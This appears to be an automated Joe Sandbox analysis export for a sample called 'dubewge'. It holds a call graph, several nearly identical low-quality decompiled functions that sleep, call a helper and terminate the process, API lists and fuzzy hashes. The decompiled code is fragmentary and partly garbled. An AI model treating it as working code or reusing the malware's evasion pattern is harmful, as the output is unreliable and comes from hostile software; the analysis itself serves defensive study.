                      callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                      Control-flow Graph

                      C-Code - Quality: 23%
                      			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t11;
                      				void* _t16;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t22 = __eflags;
                      				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                      				_t17 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                      				if(_t11 != 0) {
                      					_push(_a16);
                      					_push(_v8);
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, _t20); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				return __eax;
                      			}














                      0x0040180c
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000006.00000002.453474575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_400000_dubewge.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                      • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000006.00000002.453474575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_400000_dubewge.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                      • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("out 0x95, eax");
                      				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}







                      0x00401822
                      0x00401822
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000006.00000002.453474575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_400000_dubewge.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                      • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("sbb ebx, ebp");
                      				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401826
                      0x00401826
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000006.00000002.453474575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_400000_dubewge.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                      • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 20%
                      			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t10;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t22;
                      				void* _t25;
                      
                      				_t26 = __eflags;
                      				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t19 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				if(_t13 != 0) {
                      					_push( *((intOrPtr*)(_t25 + 0x14)));
                      					_push( *((intOrPtr*)(_t25 - 4)));
                      					_push(_t13);
                      					_push(_t19); // executed
                      					L00401455(0x60, _t22, __edi); // executed
                      				}
                      				 *_t19(0xffffffff, 0); // executed
                      				_t19 = _t19 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401834
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000006.00000002.453474575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_400000_dubewge.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                      • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                      Uniqueness

                      Uniqueness Score: -1.00%